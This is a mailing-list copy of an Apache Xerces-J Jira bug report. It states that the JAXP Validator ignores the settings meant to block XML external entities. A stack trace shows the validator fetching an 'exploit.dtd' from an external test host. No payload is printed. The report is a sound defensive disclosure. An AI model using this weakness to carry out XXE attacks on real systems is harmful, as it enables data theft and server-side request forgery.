You are viewing a plain text version of this content. The canonical link for it is here.
Posted to j-dev@xerces.apache.org by "Samuel Hailemichael (Jira)" <xe...@xml.apache.org> on 2023/07/13 18:53:00 UTC
[jira] [Created] (XERCESJ-1758) XML validator xxe vulnerability
Samuel Hailemichael created XERCESJ-1758:
--------------------------------------------
Summary: XML validator xxe vulnerability
Key: XERCESJ-1758
URL: https://issues.apache.org/jira/browse/XERCESJ-1758
Project: Xerces2-J
Issue Type: Bug
Components: JAXP (javax.xml.validation)
Reporter: Samuel Hailemichael
During the implementation of Validator using apache xerces, setting features that prevent XML External Entity are not working. When parsing through an XML file, I consistently get DNS callbacks when attempting to load an external dtd with a DOCTYPE declaration.
{*}{*}{*}Attempt 1{*}
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));{code}
When using a validator it doesn't throw a fatal error exception when a document containing a DOCTYPE declaration is being parsed. Here's an example of an outbound call when an XML file containing a DOCTYPE declaration is being parsed through the validator.
{code:java}
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
at javax.xml.validation.Validator.validate(Validator.java:124) {code}
Instead of an outbound call, it should throw an exception for a DOCTYPE declation on the xml file. **
*Attempt 2*
{code:java}
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>))); {code}
This implementation is the recommended way for external entity prevention for validators but gives this error when implemented with xerces.
{code:java}
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source) {code}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: j-dev-unsubscribe@xerces.apache.org
For additional commands, e-mail: j-dev-help@xerces.apache.org